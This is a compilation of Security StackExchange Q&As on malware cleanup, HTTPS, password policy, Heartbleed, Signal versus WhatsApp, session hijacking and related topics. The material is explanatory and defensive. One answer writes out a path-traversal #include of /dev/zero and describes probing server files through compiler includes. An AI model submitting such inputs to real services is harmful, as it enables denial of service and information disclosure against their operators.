uninfected computer, though, so you do not contaminate it.) I don't have backups of my family photos or my master thesis from before the infection occurred. Is it safe to restore backups made after the infection occurred? Any backups made after the virus infection occured could potentially be infected. A lot of the times they are not, but they could be. Since it is very hard to pinpoint exactly when the infection occured (it may be before you started to notice symptoms) this applies to all backups. Also, Windows restore points can be corrupted by a virus. It is better to archive copies of your personal files on external or cloud storage. If you are restoring them from external or cloud storage on a computer that has already been nuked from orbit make sure you scan all the files you are restoring before you open them. Executable files (such as .exe) can contain viruses, and so can Office documents. However, picture and movie files are likely safe in most cases . Do I need to worry about peripherals getting infected? Do I need to do anything about my router or other devices on my home network? Peripherals can be infected. Once you have re-installed your OS you should copy all the files off your thumb drive, scan them with antivirus, format the thumb drive, and restore the files to the thumb drive as needed. Most routers will be fine, however, it is possible for DNS settings to be compromised either through a weak password or malicious use of UPnP . This can easily be resolved by resetting the router to factory defaults. You may also want to configure your DNS settings to either google dns or OpenDNS . If you have some type of network attached storage, you should do a full scan of it with antivirus before using any of the files on it. See Also: Help! My information has been stolen! What do I do now? THIS IS WORKING DRAFT FEEL FREE TO WIKI/EDIT AS NEEDED
{ "source": [ "https://security.stackexchange.com/questions/138606", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98538/" ] }
138,858
I'm working for a business that deals with web application development, and I am the "Security Expert". I recently implemented HTTPS in an application with Let's Encrypt , and my boss is asking me to prove that HTTPS really encrypts the information. How can I do that?
My boss is asking me to prove that HTTPS really encrypts the information. How can I do that? On a basic level, you can use a packet inspector or simple port forwarding proxy. Perhaps Wireshark will inspect the packets easily enough. You should quickly be able to find that the HTTP traffic is plain text, while the HTTPS is binary gibberish. (with the exception of the hostname) However, this only proves that the connection is obfuscated. It does not prove encryption or security. Specifically it does nothing to show immunity to MiTM. Fortunately, the browser does all this for you. If a modern browser tries to connect to an HTTPS web page, it will verify the following: Strong enough hash algorithms for the certificates involved. Strong enough encryption algorithms. (i.e. it is actually encrypted) Certificate chain issued by trusted Certificate Authority(s) (i.e. CA who verifies domain ownership prior to issuing their certificates) Non-expiry of the certificates. Matching hash values means there will be no MiTM. While your boss may like to see the wireshark gibberish comparing HTTP to HTTPS, a stronger test is to quite simply visit the HTTPS site with a modern browser. Be sure the browser has not been pre-configured to ignore the warning. (i.e. test from multiple computers and smartphones) If you plan to continue HTTPS permanently (which you should), a wise precaution would be to force redirect all HTTP visits to the HTTPS site , because you cannot guarantee that all visitors will include the https:// prefix when visiting your site.
{ "source": [ "https://security.stackexchange.com/questions/138858", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124960/" ] }
138,881
I have a small server and I would like to check compile times on C programs provided by users. The programs would never be run only compiled. What risks are there to allowing users to compile arbitrary C using gcc 5.4.0?
A bit of a weird one, but: it's a denial-of-service risk, or potential information disclosure. Because C's preprocessor will cheerfully include any file specified in an #include directive, somebody can #include "../../../../../../../../../../dev/zero" and the preprocessor will try to read to the end of /dev/zero (good luck). Similarly, especially if you let people see the output of their compilation attempts, somebody could try including various files that may or may not be present on your system, and could learn things about your machine. Combined with clever usage of #pragma poison , they might even learn things about the file contents even if you don't provide full error messages. Relatedly, pragmas can alter a lot of preprocessor, compiler, or linker behavior, and are specified in source files. There's probably not one that lets somebody do something like specify the output file name or something like that, but if there is, it could be abused to override sensitive files, or get itself executed (by writing into cron or similar). There might be something similarly dangerous. You really should be careful about compiling untrusted code.
{ "source": [ "https://security.stackexchange.com/questions/138881", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126570/" ] }
138,957
I work with civil rights for children and youth and am trying to create a website for LGBT youth and children and their families. The website needs to be safe as it is still very dangerous in many countries to admit to being gay (or LGBTQ). I have a series of short children's films that I would like to make accessible for free on a website but the youth, families and teachers who access the site need to be untraceable. Can I make a website where the security lies within the website? People and kids coming to the site will not be setting up their own security measures to not be traced.
Don't do it If you are targeting unsafe regimes, the consequences can be severe. For example, in Iran, condemned homosexuals are usually sentenced to death by hanging. It would only take the slightest lapse on the part of your site, or one of your users for this to be incriminating evidence. Can you imagine the guilt you would feel that your well-intentioned site ended up being evidence that led to an execution? To operate online subversively in a repressive regime takes extreme skill and caution. Simply using Tor would be a red flag in itself. While hacker groups like anonymous may be able to get away with this, normal users cannot. There have been comments on other answers saying (roughly) "use HTTPS, it's fine". I cannot stress strongly enough how that is dangerous advice. HTTPS reveals the domain name the user is accessing, it leaves trace on the client computer, and it's likely that nation-states (including Iran) can produce fake certificates and intercept all HTTPS traffic.
{ "source": [ "https://security.stackexchange.com/questions/138957", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126642/" ] }
138,996
An NHS doctor I know recently had to do their online mandatory training questionnaire, which asks a bunch of questions about clinical practice, safety and security. This same questionnaire will have been sent to all the doctors in this NHS trust. The questionnaire included the following question: Which of the following would make the most secure password? Select one: a. 6 letters including lower and upper case. b. 10 letters a mixture of upper and lower case. c. 7 characters that include a mixture of numbers, letters and special characters. d. 10 letters all upper case. e. 5 letters all in lower case. They answered "b", and they lost a mark, as the "correct answer" was apparently "c". It is my understanding that as a rule, extending password length adds more entropy than expanding the alphabet. I suppose the NHS might argue that people normally form long passwords out of very predictable words, making them easy to guess. But if you force people to introduce "special characters" they also tend to use them in very predictable ways that password guessing algorithms have no trouble with. Although full disclosure, I'm not a password expert - I mostly got this impression from Randall Munroe (click for discussion): Am I wrong?
By any measure, they're wrong: Seven random printable ASCII: 95 7 = 69 833 729 609 375 possible passwords. Ten random alphabetics: 52 10 = 144 555 105 949 057 024 possible passwords, or over 2000 times as many. Length counts. If you're generating your passwords randomly, it counts for far more than any other method of making them hard to guess.
{ "source": [ "https://security.stackexchange.com/questions/138996", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31160/" ] }
139,182
I've been watching Defcon videos recently (in no way am I a hacker myself) and saw a video of someone demonstrating a security camera hack. For this hack you needed to know the IP address of the camera but there is no obvious way on how to do it. With devices like Phones and Computers it's easy to get the IP but it seems to be a little harder with other devices.
Connecting 'things' to the Internet is becoming common because of the benefits of remote communication. You can have your camera upload its footage to a cloud storage server, or be able to view the camera remotely, for instance. Any device on the Internet is exposed and subject to network mapping. The entire Internet is constantly being scanned, and once an IP is identified, there are processes that attempt to determine what the IP is connected to (web server, camera, fridge, your dog, etc.) From there, attackers (or researchers) can probe those devices for weaknesses and vulnerabilities (or default passwords). To help out the attackers and researchers, databases of these IP-to-thing mappings are maintained (Shodan, for instance). Then it is trivial to simply search for "security camera Acme Security model xyz123" and apply a specific hack (as you witnessed).
{ "source": [ "https://security.stackexchange.com/questions/139182", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126881/" ] }
139,221
Most sites & software seem to have a default of auto lock or time lock after 3 wrong tries. I feel that the number could be much higher - not allowing retries is mainly to prevent automated brute force attacks, I think. The likelihood of a brute force attack getting the password right in 4 retries is almost the same as getting it in 3 retries - i.e. very very small. I think this can be kept much higher without compromising security. I know there are other strategies like increasing time to retry after each retry - but I am asking about a simple strategy like locking after "n" attempts - what's a good maximum "n"?
Unless you have separate means of restricting access to the login form itself, a good baseline is don't have a hard limit . That's because it's way too easy for someone to be completely locked out of their account. This is bad because of the denial of service, obviously, but it's also a security concern in itself. It will increase support requests from people asking for their accounts to be unlocked, and the people doing the unlocking will become habituated, and social engineering attacks starting with "hey, my account is locked" become that much easier. Instead, extend timeouts — but not infinitely; just enough to restrict the number of guesses to a reasonable amount over time given your password complexity requirements.
{ "source": [ "https://security.stackexchange.com/questions/139221", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20195/" ] }
139,347
First and foremost, this is my very first experience with Code Signing. I bought Standard Code Signing from Certum for 3 years. I intend to publish applications in Czech republic mostly. But to the point, on Windows 10, when I download the signed executable, I get bumped by Smart-Screen filter which blocks the application. I don't know what to think. I used SHA256 and a time stamp. I signed it on Windows 8.1 fully updated. Here is a code snippet I used to sign the EXE file: SignTool sign /fd SHA256 /a /tr http://time.certum.pl "Barvy.exe" Did I do something wrong? Here is a picture detail of the signature of the EXE file:
Applications that are signed with a standard code signing certificates need to have a positive reputation in order to pass the Smart Screen filter. Microsoft establishes the reputation of an executable based upon the number of installations world wide of the same application. Since you haven't published your application as yet (and therefore the reputation hasn't been established as yet), the Smart Screen will continue to flag the application. There are two solutions: either wait till the application has a large user base and its reputation will be adjusted by the Smart Screen. However, the current working status might prevent users from installing and trusting the application. The second option is to sign it with an EV (Extended Validation) code signing certificate. Applications signed with an EV certificate establishes its reputation right away. To quote Microsoft: Programs signed by an EV code signing certificate can immediately establish reputation with SmartScreen reputation services even if no prior reputation exists for that file or publisher. You can find further details at Microsoft SmartScreen & Extended Validation (EV) Code Signing Certificates blogpost.
{ "source": [ "https://security.stackexchange.com/questions/139347", "https://security.stackexchange.com", "https://security.stackexchange.com/users/82570/" ] }
139,364
I have read about the Heartbleed OpenSSL vulnerability and understand the concept. However what I don't understand is the part where we pass 64k as the length and the server returns 64kb of random data because it does not check whether we really passed 64kb of echo message or 1 byte. But how is it even possible for a process on a server to return 64kb of random data from the RAM? Isn't the operating system supposed to prevent access to the real RAM and only allow access to virtual memory where one process cannot access the memory contents of other processes? Does OpenSSL run in kernel mode and thus has access to all the RAM? I would expect a segmentation fault if a process tried to access any memory that it didn't explicitly allocate. I can understand getting 64kb of random data from the process which is running the OpenSSL program itself but I don't see how it can even see the complete RAM of the server to be able to send it back to the client. UPDATE: @paj28's comment, yes it was precisely the false information that led me to wonder about this. As you said, even the official heartbleed.com advisory phrases it in a misleading way (although I would say they did so because it's intended for a much wider audience than just us technical folks and they wanted to keep it simple) For reference, here is how heartbleed.com states it(emphasis mine): The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. For any technical person that would imply the complete RAM of the virtual/physical machine.
@paj28's comment covers the main point. OpenSSL is a shared library, so it executes in the same user-mode address space as the process using it. It can't see other process' memory at all; anything that suggested otherwise was wrong. However, the memory being used by OpenSSL - the stuff probably near the buffer that Heartbleed over-reads from - is full of sensitive data. Specifically, it's likely to contain both the ciphertext and the plaintext of any recent or forthcoming transmissions. If you attack a server, this means you'll see messages sent to the server by others, and server responses to those messages. That's a good way to steal session tokens and private information, and you'll probably catch somebody's login credentials too. Other data stored by OpenSSL includes symmetric encryption keys (used for bulk data encryption and integrity via TLS) and private keys (used to prove identity of the server). An attacker who steals those can eavesdrop on (and even modify) the compromised TLS communication in realtime, or successfully impersonate the server, respectively (assuming a man-in-the-middle position on the network). Now, there is one weird thing about Heartbleed that makes it worse than you might expect. Normally, there'd be a pretty good chance that if you try and read 64k of data starting from an arbitrary heap address within a process, you'd run into an unallocated memory address (virtual memory not backed by anything and therefore unusable) pretty quickly. These holes in a process address space are pretty common, because when a process frees memory that it no longer needs, the OS reclaims that memory so other processes can use it. Unless your program is leaking memory like a sieve, there usually isn't that much data in memory other than what is currently being used. Attempting to read unallocated memory (for example, attempting to access memory that has been freed) causes a read access violation (on Windows) / segmentation fault (on *nix), which will make a program crash (and it crashes before it can do anything like send data back). That's still exploitable (as a denial-of-service attack), but it's not nearly as bad as letting the attacker get all that data. With Heartbleed, the process was almost never crashing. It turns out that OpenSSL, apparently deciding that the platform memory management libraries were too slow (or something; I'm not going to try to justify this decision), pre-allocates a large amount of memory and then uses its own memory management functions within that. This means a few things: When OpenSSL "frees" memory, it doesn't actually get freed as far as the OS is concerned, so that memory remains usable by the process. OpenSSL's internal memory manager might think the memory is not allocated, but as far as the OS is concerned, the OpenSSL-using process still owns that memory. When OpenSSL "frees" memory, unless it explicitly wipes the data out before calling its free function, that memory retains whatever values it had before being "freed". This means a lot of data that isn't actually still in use can be read. The memory heap used by OpenSSL is contiguous; there's no gaps within it as far as the OS is concerned. It's therefore very unlikely that the buffer over-read will run into a non-allocated page, so it's not likely to crash. OpenSSL's memory use has very high locality - that is, it's concentrated within a relatively small range of addresses (the pre-allocated block) - rather than being spread across the address space at the whim of the OS memory allocator. As such, reading 64KB of memory (which isn't very much, even next to a 32-bit process' typical 2GB range, much less the enormous range of a 64-bit process) is likely to get a lot of data that is currently (or was recently) in use, even though that data resides in the result of a bunch of supposedly-separate allocations.
{ "source": [ "https://security.stackexchange.com/questions/139364", "https://security.stackexchange.com", "https://security.stackexchange.com/users/127063/" ] }
139,437
Hackers are smart. Could they hack a self-driving car through its CD drive? From what I understand, malicious code could be uploaded to the driverless car via CD which could give them access to brakes, windscreen wipers, sensors, etc. (all of which could be used to potentially commit murder or hold the car ransom).
Not on a well-designed car The CD player is part of the media system. It's likely that the media system has a number of security vulnerabilities, and a malicious CD can probably take control of the media system. It would be difficult to fix this without either greatly increasing the cost, or restricting the functionality of this. The car control systems - the CAN bus - should be strongly separated from the media systems. In previous attacks, like Jeep hacking , attackers have been able to break across from the media system to the CAN bus. However, this represents poor design and implementation. The two systems should be kept separate - or at least, have a highly restricted interface - and it is possible to do that at reasonable cost. Whether any future driverless cars will be well designed remains to be seen.
{ "source": [ "https://security.stackexchange.com/questions/139437", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126881/" ] }
139,493
WhatsApp has "recently" deployed end-to-end encryption using the Signal protocol, which is of course also being used by Signal itself. The related white paper (PDF). Now this raises the question: Is there still any security benefit to use Signal over the much more widely deployed WhatsApp, now that both have good end-to-end encryption? The threat model in this case includes basically anyone not having access to the phones at the ends. It especially includes the service provider and law enforcement.
There are still a couple of security functions, which may matter to you, which Signal does better than WhatsApp. Client-Side Fanout When you use a group chat in WhatsApp, you send your message to the server who in turn distributes it to all the group members. This way WhatsApp learns all the social structures and can in theory perform traffic analysis to deduce quite a bit of information from the message volume exchanged. In Signal on the other hand, group chats are actually normal peer-to-peer chats 1 with a special flag, which is set inside the end-to-end encrypted frame. So this way OpenWhisperSystems (the makers of Signal) doesn't learn your social group structures. However they can still see that three messages are going to three different people at once and can guess that this is due to a group chat. The blog post for Signal. The server-side fan-out is stated in the white paper (PDF) . Private Group Metadata Because the previously mentioned approach of everyone just directly sending the group messages to each other is messy with regards to privileges - as achieving consensus in an asynchronous distributed system is hard - Signal has deployed a new system to enforce access control and privileges in groups without learning anything about the group structure - only about the existence of a group and a guesstimate of its size based on the size of the server-stored ciphertext. See this blog post for details and this post for the deployment announcement and this post for how group links factor into this . I was unable to find documentation on how WhatsApp handles this data. Though given they know the group membership to distribute messages, they may just store this in the clear. In-App Encryption Signal offers to encrypt the past communication at app level requiring a password to read past messages , which WhatsApp lacks completely. Obviously this can protect your messages in case of theft however you probably won't gain that much security because most people will probably not choose good passwords here for usability reasons. Use of the OS keystore Modern mobile operating systems provide a place for you to store your keys so they aren't unencrypted in the filesystem. The OS will usually either encrypt them with some hardware backed mechanisms, like iOS's secure enclave or Android will use things like ARM TrustZone for increased difficulty of key extraction. Additionally Apple is famously known for doing a really good job at the security of the iOS keychain backups. Signal uses these security features ( iOS , Android ), whereas WhatsApp (likely) does not . Optional Read and Typing notifications WhatsApp notifies you when somebody is typing and it notifies you when somebody read your message - and you can't turn it off for group chats. This however allows WhatsApp to deduce app usage behavior and your habits. Like "Do you check your WhatsApp messages at 1am?", combine that with the other meta data WhatsApp is harvesting and you can make some useful guesses about people's lifes. Additionally the "typing" notifications can be used to deduce potential contents based on context and default keyboard suggestions and other factors. Signal doesn't enforce this. Here's the original discussion on it on GitHub . As a more recent development, Signal adopted read notifications, but they're default-off (for pre-existing installations) and aren't forced-on in Group conversations. For groups I think they work indidually with each member, that is if a member and the sender have them both enabled, the sender will get the notification, which is much more privacy-focused than WhatsApp's solution. Backup Security WhatsApp offers you to backup your messages so you can recover them when your phone is inacessible or destroyed. However due to the very nature of this, the backup ( which must (also) be hosted on Google Drive ) cannot be encrypted / secured other than with your username / password for that account (which WhatsApp doesn't know). So as soon as that Google Drive account is breached or some government demands access, all the end-to-end security is gone if either party of the communication had backups enabled. As for iCloud (as opposed to Google Drive) a similar argument applies - especially as the kind of data WhatsApp is saving is not sensitive enough for Apple to use their stronger security mechanisms as they would e.g. for passwords . Even though the backup feature of Signal isn't as convenient as the one of WhatsApp it doesn't automatically store (plaintext?) copies of messages on Google servers, but rather allows you to (automatically) create a local (encrypted) file and push this one manually around. It is unclear though of WhatsApp's backup feature profits from the recent security enhancements in Google's backup infrastructure (on android at least) , so they might actually be secure. Auto-deleting Messages Automatically deleting your own old messages is good from a security standpoint. It means that if an attacker manages to break into your phone / backup that (s)he can't access all messages but only the recent ones. Auto-deletion is especially nice if you consider that you won't read all the really old messages anyways and that it will save you some storage. As of now, WhatsApp does not implement this. Signal on the other hand does. No meta-data storage Signal was recently hit by a Subpoena . They complied (of course) but could only contribute very little, which confirms that they're holding true to their privacy policy . At the same time WhatsApp is sitting on a large(r) amount of meta data and would be much more useful if hit (and if it's being disclosed). This is especially obvious if you compare what WhatsApp logs and what Signal logs. Private Contact Discovery WhatsApp uploades your entire adress book to their servers to compare which of the listed users have WhatsApp accounts. Obviously during that process WhatsApp learns your social graph, that is who you know, including people who don't use WhatsApp. Signal now on the other hand, has somewhat recently deployed a much smarter solution, using fancy modern cryptographic techniques paired with Intel's SGX technology so that OpenWhisperSystems actually doesn't learn your adress book (only the SGX enclave does and that doesn't leak it), but only needs to keep on-record who their users are and thus they also don't learn anything about which users you may know but don't chat with using Signal and which people you know but don't use Signal (yet). The details of this can be read in their blog post . Registration Locking While both Signal and WhatsApp support registration locking which forces you to enter a pre-determined PIN whenever a new device is added to an account, it is unclear how security is enforced. That is, how many tries one gets for the PIN before hitting the lock-out and whether this lock-out can be overriden by the service operator. Signal is currently beta-testing using SGX to have a verifieable upper limit on the tries you get for this. Private Link Preview Signal goes out of its way to hide which URL you're accessing from Signal when generating link previews and hiding your IP from the server . WhatsApp on the other hand has a less stringent stance on the topic though it is only "worse" than Signal in that regard by leaking the sender's IP to the service . Sender Hiding Signal has a feature that allows you to hide your identity from the server when sending a message . That is, the app can send a message to the server that will be delivered without revealing from who it is exactly. So what the Signal servers see is that somebody with a given IP sent a message to a well specified user. From what I know WhatsApp doesn't implement anything similar and instead relies on user authentication for sending to prevent impersonation and similar issues. Encrypted Profiles In Signal your profile picture and chosen name are only ever transmitted using end-to-end encryption . Also see the introducing blog post . This means that the server doesn't learn how your picture looks or what string you use to identify yourself to others. In WhatsApp however the picture is less clear. It seems highly likely that if you set these information to public they are indeed stored in the clear on the servers. However if you set it to contacts-only, it is much less clear whether WhatsApp uses its end-to-end encryption for the transport of the image or whether it's just an access-controlled API functionality on the server. At least this (unofficial) blog post claims that the end-to-end encryption is not used for profiles. Receipt Confirmations via the Secure Channel Signals sends the notification that a message has been received using the same secure channel as the message itself. Due to the design of the signal protocol, this implies a fresh update of the key material. In WhatsApp on the other hand, the receipt notifications are transported outside of this end-to-end protocol. Concretly this means that if only one party in a conversation (or group) talks a state compromise of that party will allow all subsequent messages of that party to be passively decrypted in WhatsApp and whereas only the messages until the next receipt notification are leakable for Signal. Ephemeral Messages? They're a feature supported both in WhatsApp and Signal - messages that are deleted on the receivers end after some condition is satisfied. However there's no real security impact for their implementation as the rule "if you can see it, you can photograph it with a different device" applies. So TL;DR: The remaining security differences (after the protocol update) are mainly that WhatsApp generates a lot of meta data to be convenient while Signal tries to avoid meta data. 1: They don't actually use peer-to-peer communication in the sense of directly connecting to their peers. Rather they use the secure two-way channels to everyone else.
{ "source": [ "https://security.stackexchange.com/questions/139493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
139,549
By not accepting my fingerprints and asking for passcode, how is it more secure? I believe checking fingerprints is a more secure way as compared to entering a passcode.
Since iOS 8, full disk encryption is enabled by default and the passcode is used as key (paired with some secret kept in the phone's HSM so offline bruteforcing is not possible, making it relatively secure even with only a numerical code). For FDE to work we need something consistent as a key. A passcode fits the bill perfectly, it either matches or doesn't. You also do not need to know the code itself to be able to tell if the entry is correct - an one way hash will still tell you whether the entry was correct while making it extremely difficult to reverse the process and get the code from the hash. A fingerprint on the other hand is never an exact match. It's always fuzzy and there is a tolerance percentage under which the fingerprint is considered matching, otherwise it's not. Since it's never quite consistent most hashes we use for passwords are out of the way so you have to keep an entire picture of the fingerprint to be able to tell whether the fingerprint is correct, so if someone gets that data it's trivial to make a fake print based on that, whether as with passwords you'd have to bruteforce the hash before you get the actual password. This also means a fingerprint can't be used as a key for FDE, because it will always be a little different on each scan, or, if the fingerprint image is kept somewhere unencrypted for comparison before revealing the real FDE key then it's insecure because an attacker could just obtain that real key right away (using hardware attacks, exploits, etc). This is the reason why a passcode is asked on first boot. It decrypts the data partition and keeps the key cached in RAM, where on subsequent unlocks the partition is already mounted and decrypted, and the lock is purely a software restriction. It would also make sense for the phone to keep fingerprint data on the encrypted partition, which means at boot the phone has nothing to compare your fingerprint against to tell if it's correct or not. Finally fingerprints are not more secure than passwords because you leave them on everything you touch.
{ "source": [ "https://security.stackexchange.com/questions/139549", "https://security.stackexchange.com", "https://security.stackexchange.com/users/110848/" ] }
139,738
I've spoken to an employee of a big international company in germany. He said, employees are warned if their new password is too similar to the old password. (e.g. if they change the password from ThePassword12345 to ThePassword12344 . The aim of using hashing functions is to not be able to tell the difference between a password and a random string. As they can tell if the difference is too small, they have to save at least one password in cleartext. The employee said they use Windows/SAP systems (and the warning occours on all systems) My Question is therefore if my analysis is correct or where my error is. As they hire also lots of computer science people, i would guess the error relies on my side, not theirs.
Usually, when users change their password on a system, they're required to input their old password as well, along with the new password. Now, this old password is hashed and checked against the hash stored in the machine(password is not stored in cleartext). If the hashes match, then the system proceeds to compare the old password and new password . If it finds that the 2 passwords are too similar, then it throws an error, informing the user about the same. In case the passwords are sufficiently different according to the system logic, then the new password is hashed and this new hash value is stored in the system, hence successfully changing the user's password. In case the users are NOT required to input their old password, I'd recommend you better check with your IT support team, and raise a concern with the system owner... UPDATE: As pointed out in the comments, there's one more way to get around this issue without asking for user's old password. When the user enters the new password, the system generates the variations of the new password entered, hashes each one of them, and compares each hash against the old password's hash. If any of the hash matches, it throws an error. Else, it successfully changes the password.
{ "source": [ "https://security.stackexchange.com/questions/139738", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83032/" ] }
139,795
In configuring a new system today (Juniper Space, Linux-based Network Management platform), I came across a bizarre password requirement that I'm curious about. Upon logging into the web UI with the default credentials, I was prompted to change the password, which is good, and I went to do, but my randomly generated password was rejected because the last character was a number. This struck me as all the more strange, given that the password I provided for the command line interface ended in a number, and it was accepted. In my experience, password requirements like this generally have some underlying reasoning behind them, like Q and Z not being present on old telephone keypads , or legacy systems compatibility or j ust plain poor systems/policies/whatever . I'm having a much more difficult time explaining this particular policy with any of those explanations, though. Does anyone have any insight into the reasoning behind a password policy that would prohibit a numeric last character?
It's likely an effort to discourage passwords that fit common formats or character masks. If a password policy requires use of a number many people will chose to put their number at the end of a word or words. Here are a couple examples from corporate environments: NetSPI Top Password Masks for 2015 2015 Trustwave Global Security Report - password masks Attackers like this user habit because it makes their hybrid password cracking or guessing attacks easier. They can focus on combining word lists with numbers added to the end rather than a more time consuming brute force approach. So some organizations implement a policy like this in an attempt to improve security by getting users to put their numbers is a less predictable place. It sounds like in your situation they're not combining this with any other complexity checking and instead rejecting all passwords that end in a number, regardless of how random they are otherwise. That's not a very good way to implement this type of checking, but they're not alone in taking this approach.
{ "source": [ "https://security.stackexchange.com/questions/139795", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11622/" ] }
139,906
Making a strong password AND remembering it is like eating while talking. You choke. So the same thing might happen if you have a p455w0(R).|L1K3thys and someone cracks it. I'm just not sure if it's actually true. Are these leet passwords more crackable than completely random passwords that a random password generator makes? Are there any leet password crackers out there? Is there a way to safely simulate a penetration test on some offline leet passwords?
Cracking libraries do include common Leet substitution algorithms and there are Leet dictionaries which can be used by tools like Hydra. There are also tools to convert an entire dictionary of words to "Leet-speak" More importantly hashes are available for the most common Leet passwords and Leet word variations so if someone is cracking a large password dump of these against a very large set of pre-hashed words which include Leet passwords in use they are very likely to find matches. Finally a better way to determine real-world consequences might be to look at password dumps which have already occurred that also included Leet passwords. The proof of them being cracked is visible in a real world password dumps that have gone public. Likewise their presence in common hash tables (MD5 and SHA1) would also lend likelihood to them being cracked easily.
{ "source": [ "https://security.stackexchange.com/questions/139906", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91474/" ] }
139,952
Given the appropriate XSS vulnerability, an attacker can hijack somebody's session with the data that's passed to and from the server. Why aren't sessions always exclusive to the IP they were started on? i.e., when would a website/service need to persist an authenticated session across multiple IP addresses? I'm not sure why sessions permit this, thus I don't understand how this is ever a feasible route for an attacker.
First, linking a session to an IP address will not make it secure since the server could see many different users as using the same IP address for various reasons (all types of proxy servers, for instance: client, reverse proxy, CDN, etc.). Second, the same user could very well use different IP addresses for the same session. For instance, someone could be switching between networks from the same device. So, since it's not effective and it causes usability and scalability issues, that is not an feature that is usually enabled.
{ "source": [ "https://security.stackexchange.com/questions/139952", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
139,992
Hardened Servers, IPS, firewalls and all kinds of defenses cannot solve security problems if people leak information without knowing simply because they're misguided. I already tried to instruct them but they simply don't care, they cannot see themselves as an important part of our intrusion prevention system. The company deals with sensitive information, but they prefer not to think about it. Our policies are one of the best I have ever seen, but no one follows them except the security team. What should I do? Should I throw in their faces the logs of how many attacks my team is dealing with because employees bypass all the security? If my team fails the telecommunication system of my country can be completely affected. I thought it was a motivation to take care of security, but no one cares except us because it's our job. Has someone already dealt with a situation like this? Should I give up?
High Level Culture In my experience, shifting a security culture takes 3 steps: Get management buy-in to do things differently Get personal management engagement to lead the way on what is important Set the tone through training, media, and in-person events that "people like us do things like this" Here's the thing: management has to be leading the charge on this, with help with the security champions. Management has to want, and encourage, the technical controls to apply to themselves. If management gets special conditions, game over. Get a manager, the higher up, the better, to personally and publically express their desire to participate in a properly secure environment. Get them to express the frustrations and inconveniences, too. But also communicate that the inconveniences are important for the health of the company. "I grumble on the mornings when I'm prompted to change my password. I think, I changed it just [1|3] months ago! But, I know that when I do, I'm cutting off a hacker's route to using my credentials to harm me and this company" [yes, I am aware of the controversy about frequent password changes, but roll with the example for a second] Then, once you have this great foundation, then start bringing that message to the personal level to everyone. Teach Them to Secure Themselves It can be easy for people to see company policy as disconnected from reality (have you filled in your TPS reports?). So pushing hard on company security can be a losing battle. Instead, consider teaching people how to secure themselves and their families. Show how hackers have and do compromise home computers and mobile devices. By doing this, you get them to really see the dangers involved. Once you have this buy-in, then it is much easier to shift the focus to dangers at work. Get Some Teeth If everyone is getting along with the policies, then that's great, but you need to have some worst-case consequences for people who do not comply. This is a tricky subject and you need to work with HR, GRC, and management to make this work.
{ "source": [ "https://security.stackexchange.com/questions/139992", "https://security.stackexchange.com", "https://security.stackexchange.com/users/125067/" ] }
140,064
After I received dozen of spam mails over the last year with my thrashmail (used for "You must log in once to check out this product.."-Sites, etc.) I noticed they were mostly translated (if they are at all) horribly. I thought about that after reading the Wikipedia article about the ransomware "Locky" where the Spam Message pattern was shown. Dear (random name): Please find attached our invoice for services rendered and additional disbursements in the above-mentioned matter. Hoping the above to your satisfaction, we remain Sincerely, (random name) (random title) Refering to my experience, only a few mails were translated well enough to even consider it as my native tongue (German, by the way). So, I was wondering If non-English users are theoretically better protected from international scam/phishing than native speakers. Of course there are a lot of properly translated versions out there, or they are also based in the same country, but my inbox is dominated by non-German Spammers. Or would you (as a 'normal' user) trust a [insert random title here] who can't properly speak your native language and therefore sounds like Master Yoda with Dyslexia? Or if it was in English I'd wonder "Why the heck would a [insert radnom country I've never heard of] Lawyer write to me in English?" I believe these users are a bit safer, as Phishing is mostly about gaining the victim's trust. I'm interested in whether this thesis is true. Edit : It's awesome to see how multifarious the Answers and Comments are. Kudos to the Stack InfoSec Community.
There is a really, really good paper on this here . Tl;dr: 95% of spam is in English In f.ex. Germany only 17% of the spam is in German In Scandinavia it's less than 1% in the local language Conclusion I : Yes, generic phishing is mostly directed to English speaking people. I can only confirm that many German people will not even consider opening a mail with a non-German subject. Conclusion II : The main factor for the phishers will be to gain proficiency at the target language. Target languages are English and other "first world" languages, but they are differently hard to learn. Since it's much easier to auto-translate and learn basic English than for example Icelandic, phishing will be much less effective on non-English speakers. But : Spear phising is much more dangerous and will always be done in a local language, so statistics can't take that into account.
{ "source": [ "https://security.stackexchange.com/questions/140064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/108679/" ] }
140,217
Can't an attacker just change his/her session (or cookie because it's stored locally) information then fool the server that he's the legitimate user? Say for example, if a website uses the database id as an identifier, the attacker logs in to his account to get his cookie. Then just modify his ID to impersonate another legitimate user.
Yes, if you can guess another user's session key then you can become them. This is why you need to have a unpredictable session key that can be revoked. There have been cases where best practice haven't been followed, for example Moonpig produced an API which used a session key that was the user's ID which is set on account creation as a consecutive number. This meant that you could be any user. If that user wanted to stop you, they couldn't as it is the key for all the sessions they are engaged in and can't be changed as it is the unique ID for them within the Moonpig database. This is a really good example of how to do it wrong. Session keys should be unpredictable and able to be thrown away (possibly able for one user to have many session keys). As @Mindwin mentioned in the comments, the session key should be in the HTTP payload (cookies or form data [best practice is in cookies]) and not in the URL. This is because having session data in the URL makes it so you have to put it in the URL of every link, stops you from persisting a session if the user leaves and comes back, copying the URL and sending it to someone gives them your session data and there is a limit of characters that a URL can be. You should also use HTTPS wherever possible so that an attacker can't snoop on the HTTP payload and get a copy of the session key that way (this is how Firesheep worked).
{ "source": [ "https://security.stackexchange.com/questions/140217", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123975/" ] }
140,418
I heard about Dirty COW but couldn't find any decent writeup on the scope of the bug. It looks like the exploit can overwrite any non-writable file, which makes me guess that local root is possible via substitution of SUID programs. Is that right? What else do we know about Dirty COW? Is it possible to exploit it remotely? Does it affect Android?
